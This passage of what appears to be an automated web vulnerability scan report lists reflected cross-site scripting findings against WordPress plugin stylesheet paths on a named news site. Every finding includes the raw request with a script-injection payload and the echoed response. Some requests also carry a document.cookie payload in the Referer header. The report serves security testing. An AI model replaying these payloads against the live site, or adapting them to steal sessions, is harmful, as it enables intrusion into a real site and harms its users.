User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:11:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=9fde11401aee697d2f62e978ce373c3d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:11:07 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:11:07 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/menu-managerd54cc\"><script>alert(1)</script>3dcd13916d8/display/styles/menu-manager.css?ver=2.0.0'; }); return true;" >
...[SNIP]...

4.247. http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/styles/menu-manager.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/menu-manager/display/styles/menu-manager.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17a0d"><script>alert(1)</script>7d151f57cba was submitted in the REST URL parameter 4. This input was echoed as 17a0d\"><script>alert(1)</script>7d151f57cba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/menu-manager/display17a0d"><script>alert(1)</script>7d151f57cba/styles/menu-manager.css?ver=2.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:12:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=9fde11401aee697d2f62e978ce373c3d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:12:03 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:12:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/menu-manager/display17a0d\"><script>alert(1)</script>7d151f57cba/styles/menu-manager.css?ver=2.0.0'; }); return true;" >
...[SNIP]...

4.248. http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/styles/menu-manager.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/menu-manager/display/styles/menu-manager.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94b8b"><script>alert(1)</script>6eb885d1aad was submitted in the REST URL parameter 5. This input was echoed as 94b8b\"><script>alert(1)</script>6eb885d1aad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/menu-manager/display/styles94b8b"><script>alert(1)</script>6eb885d1aad/menu-manager.css?ver=2.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:13:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=9fde11401aee697d2f62e978ce373c3d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:13:38 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:13:38 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/menu-manager/display/styles94b8b\"><script>alert(1)</script>6eb885d1aad/menu-manager.css?ver=2.0.0'; }); return true;" >
...[SNIP]...

4.249. http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/styles/menu-manager.css [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/menu-manager/display/styles/menu-manager.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb93d"><script>alert(1)</script>8a7602599a5 was submitted in the REST URL parameter 6. This input was echoed as cb93d\"><script>alert(1)</script>8a7602599a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/menu-manager/display/styles/menu-manager.csscb93d"><script>alert(1)</script>8a7602599a5?ver=2.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:15:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=9fde11401aee697d2f62e978ce373c3d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:15:16 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:15:16 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/menu-manager/display/styles/menu-manager.csscb93d\"><script>alert(1)</script>8a7602599a5?ver=2.0.0'; }); return true;" >
...[SNIP]...

4.250. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/css/ngg_shadow.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/nextgen-gallery/css/ngg_shadow.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3c67"><script>alert(1)</script>610b9455319 was submitted in the REST URL parameter 1. This input was echoed as b3c67\"><script>alert(1)</script>610b9455319 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentb3c67"><script>alert(1)</script>610b9455319/plugins/nextgen-gallery/css/ngg_shadow.css?ver=1.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:12:15 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=a538c484d31b7acc540251523e95d5cf
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:12:20 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:12:20 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-contentb3c67\"><script>alert(1)</script>610b9455319/plugins/nextgen-gallery/css/ngg_shadow.css?ver=1.0.0'; }); return true;" >
...[SNIP]...

4.251. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/css/ngg_shadow.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/nextgen-gallery/css/ngg_shadow.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bce72"><script>alert(1)</script>5a211b9b14c was submitted in the REST URL parameter 2. This input was echoed as bce72\"><script>alert(1)</script>5a211b9b14c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsbce72"><script>alert(1)</script>5a211b9b14c/nextgen-gallery/css/ngg_shadow.css?ver=1.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:13:44 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=a538c484d31b7acc540251523e95d5cf
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:13:51 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:13:51 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/pluginsbce72\"><script>alert(1)</script>5a211b9b14c/nextgen-gallery/css/ngg_shadow.css?ver=1.0.0'; }); return true;" >
...[SNIP]...

4.252. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/css/ngg_shadow.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/nextgen-gallery/css/ngg_shadow.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a6a6"><script>alert(1)</script>523d0c5812c was submitted in the REST URL parameter 3. This input was echoed as 7a6a6\"><script>alert(1)</script>523d0c5812c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-gallery7a6a6"><script>alert(1)</script>523d0c5812c/css/ngg_shadow.css?ver=1.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:15:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=a538c484d31b7acc540251523e95d5cf
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:15:27 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:15:27 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-gallery7a6a6\"><script>alert(1)</script>523d0c5812c/css/ngg_shadow.css?ver=1.0.0'; }); return true;" >
...[SNIP]...

4.253. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/css/ngg_shadow.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/nextgen-gallery/css/ngg_shadow.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63507"><script>alert(1)</script>c0dbf220b11 was submitted in the REST URL parameter 4. This input was echoed as 63507\"><script>alert(1)</script>c0dbf220b11 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-gallery/css63507"><script>alert(1)</script>c0dbf220b11/ngg_shadow.css?ver=1.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:16:59 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=a538c484d31b7acc540251523e95d5cf
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:17:01 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:17:01 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-gallery/css63507\"><script>alert(1)</script>c0dbf220b11/ngg_shadow.css?ver=1.0.0'; }); return true;" >
...[SNIP]...

4.254. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/css/ngg_shadow.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/nextgen-gallery/css/ngg_shadow.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc53c"><script>alert(1)</script>d817813d048 was submitted in the REST URL parameter 5. This input was echoed as dc53c\"><script>alert(1)</script>d817813d048 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-gallery/css/ngg_shadow.cssdc53c"><script>alert(1)</script>d817813d048?ver=1.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:18:51 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=a538c484d31b7acc540251523e95d5cf
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:18:54 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:18:54 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-gallery/css/ngg_shadow.cssdc53c\"><script>alert(1)</script>d817813d048?ver=1.0.0'; }); return true;" >
...[SNIP]...

4.255. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ffcb"><script>alert(1)</script>fc0669eabc9 was submitted in the REST URL parameter 1. This input was echoed as 8ffcb\"><script>alert(1)</script>fc0669eabc9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content8ffcb"><script>alert(1)</script>fc0669eabc9/plugins/nextgen-gallery/shutter/shutter-reloaded.css?ver=1.3.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:12:17 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f98fdf2c77f5f59862a5402157347a41
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:12:18 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:12:18 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content8ffcb\"><script>alert(1)</script>fc0669eabc9/plugins/nextgen-gallery/shutter/shutter-reloaded.css?ver=1.3.0'; }); return true;" >
...[SNIP]...

4.256. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d112"><script>alert(1)</script>f10e6f9e41c was submitted in the REST URL parameter 2. This input was echoed as 9d112\"><script>alert(1)</script>f10e6f9e41c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins9d112"><script>alert(1)</script>f10e6f9e41c/nextgen-gallery/shutter/shutter-reloaded.css?ver=1.3.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:14:00 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f98fdf2c77f5f59862a5402157347a41
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:14:08 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:14:08 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins9d112\"><script>alert(1)</script>f10e6f9e41c/nextgen-gallery/shutter/shutter-reloaded.css?ver=1.3.0'; }); return true;" >
...[SNIP]...

4.257. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9ff5"><script>alert(1)</script>ea33fa666d7 was submitted in the REST URL parameter 3. This input was echoed as b9ff5\"><script>alert(1)</script>ea33fa666d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-galleryb9ff5"><script>alert(1)</script>ea33fa666d7/shutter/shutter-reloaded.css?ver=1.3.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
